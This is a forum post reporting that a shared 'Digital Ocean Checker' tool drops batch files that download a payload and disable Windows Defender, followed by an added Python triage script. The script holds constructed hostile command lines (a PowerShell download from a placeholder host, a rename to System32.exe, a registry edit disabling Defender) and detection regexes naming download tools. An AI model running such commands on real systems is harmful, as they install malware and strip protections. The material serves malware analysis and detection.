[Scan Report & Debloated download]: Digital Ocean Checker by Redey (shared by Betski) 06-07-2020, 03:27 PM
#1
Thanks to @HailHydra, this wouldn't have been revealed without him notifying me about Betski's software posts
When loading the executable, it unpacks into a folder (%appdata%); here are the files extracted by the application
![[Image: QGU15XfxQD6Tk_S2D-eHIg.png]](https://image.prntscr.com/image/QGU15XfxQD6Tk_S2D-eHIg.png)
wof.bat is where the malware gets downloaded, via this command
![[Image: mnypDoNhSQ_0JvLHJOmM-Q.png]](https://image.prntscr.com/image/mnypDoNhSQ_0JvLHJOmM-Q.png)
av.bat tries to disable Windows Defender via regedit
![[Image: pUZRdH9TRMWx_JMq_VqN0w.png]](https://image.prntscr.com/image/pUZRdH9TRMWx_JMq_VqN0w.png)
I haven't been able to decompile test.exe; however, it has a lot of detections on VirusTotal, and browsing through it via MiTeC EXE Explorer shows interactions with the "Downloads" folder
![[Image: ONYozkooS52GBQ9VBazlDg.png]](https://image.prntscr.com/image/ONYozkooS52GBQ9VBazlDg.png)
The file that gets downloaded (Systemas.exe) can't be downloaded anymore, so I can't go further; however, the script renames it to System32.exe, which is a suspicious file name
![[Image: safv3U-9S3a4uLoCGCouWw.png]](https://image.prntscr.com/image/safv3U-9S3a4uLoCGCouWw.png)
The thread was released 1 day after the edits to the application (containing the malware) had been made
![[Image: CmiO2CeMR2yl3xFY0IpWOQ.png]](https://image.prntscr.com/image/CmiO2CeMR2yl3xFY0IpWOQ.png)
![[Image: rUlijW36QIKIbILU3-WdtQ.png]](https://image.prntscr.com/image/rUlijW36QIKIbILU3-WdtQ.png)
Here's a download link with only the standalone application:
Files (1):
Code:
Redeye Digital Ocean Checker.exe | 1.4mb
(This post was last modified: 06-07-2020, 03:30 PM by miso.)
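As an added example that is not part of the original post (and not code from Redey, Betski or the checker itself): a small offline triage script that looks for the three behaviours the report describes in dropped batch files, namely a remote download command, a registry edit aimed at Windows Defender, and a rename of the payload to a system-looking name such as System32.exe. The file names wof.bat and av.bat come from the post; their contents below are constructed for the example (the real scripts are only shown as screenshots), and the download host is a placeholder.

```python
"""
Added example: offline triage of dropped batch files for the behaviours the
report describes. Sample batch contents are constructed for this example;
they are not the real wof.bat / av.bat from the post.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Tuple

# Patterns for the three behaviours from the report. They are deliberately
# broad: triage wants recall, and an analyst reviews every hit by hand.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|downloadfile|bitsadmin|certutil\s+-urlcache|curl\s+|wget\s+)",
    re.IGNORECASE,
)
DEFENDER_REG_RE = re.compile(r"reg(?:\.exe)?\s+add\b.*windows defender", re.IGNORECASE)
SYSTEM_NAME_RE = re.compile(
    r"\b(?:ren(?:ame)?|move|copy)\b.*\b(system32|svchost|csrss|lsass)\.exe\b",
    re.IGNORECASE,
)
COMMENT_RE = re.compile(r"(?i)^(rem\b|::)")


@dataclass
class Finding:
    file: str
    line_no: int
    indicator: str
    text: str


def scan_batch(name: str, content: str) -> List[Finding]:
    """Return one Finding per (line, indicator) match in a batch script."""
    findings: List[Finding] = []
    for n, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or COMMENT_RE.match(line):
            continue  # blank lines and batch comments carry no behaviour
        if DOWNLOAD_RE.search(line):
            findings.append(Finding(name, n, "remote_download", line))
        if DEFENDER_REG_RE.search(line):
            findings.append(Finding(name, n, "defender_registry_edit", line))
        if SYSTEM_NAME_RE.search(line):
            findings.append(Finding(name, n, "system_name_rename", line))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Distinct indicator kinds decide the verdict; counts alone do not."""
    kinds = {f.indicator for f in findings}
    if len(kinds) >= 2:
        return "dropper-like"
    if len(kinds) == 1:
        return "suspicious"
    return "no indicators"


def triage(samples: Dict[str, str]) -> Dict[str, Tuple[str, List[Finding]]]:
    """Scan a mapping of file name -> content and return verdict plus findings."""
    result = {}
    for name, content in samples.items():
        found = scan_batch(name, content)
        result[name] = (verdict(found), found)
    return result


def triage_directory(folder: str) -> Dict[str, Tuple[str, List[Finding]]]:
    """Same as triage(), but over the *.bat files in a real folder (e.g. %APPDATA%\\...)."""
    paths = Path(folder).glob("*.bat")
    return triage({p.name: p.read_text(errors="replace") for p in paths})


# Constructed sample scripts mirroring the behaviours described in the report.
# The host "payload.example.invalid" is a placeholder, not the real download URL.
SAMPLES = {
    "wof.bat": (
        "@echo off\r\n"
        "rem constructed sample, not the real file\r\n"
        'powershell -c "Invoke-WebRequest http://payload.example.invalid/Systemas.exe '
        '-OutFile %USERPROFILE%\\Downloads\\Systemas.exe"\r\n'
        'ren "%USERPROFILE%\\Downloads\\Systemas.exe" System32.exe\r\n'
    ),
    "av.bat": (
        "@echo off\r\n"
        "rem constructed sample, not the real file\r\n"
        'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
        "/v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\n"
    ),
    "cleanup.bat": "@echo off\r\ndel /q %TEMP%\\*.log\r\n",  # benign control
}

if __name__ == "__main__":
    for name, (v, found) in triage(SAMPLES).items():
        print(f"{name}: {v}")
        for f in found:
            print(f"  line {f.line_no} [{f.indicator}] {f.text}")
```

Run against the constructed samples, wof.bat is flagged dropper-like (download plus rename to System32.exe), av.bat is flagged suspicious on the Defender registry edit alone, and the benign control produces no indicators. Point `triage_directory()` at the folder the executable unpacks into to run the same checks on real dropped files; the regexes are a starting point for manual review, not a replacement for the AV verdicts the post cites.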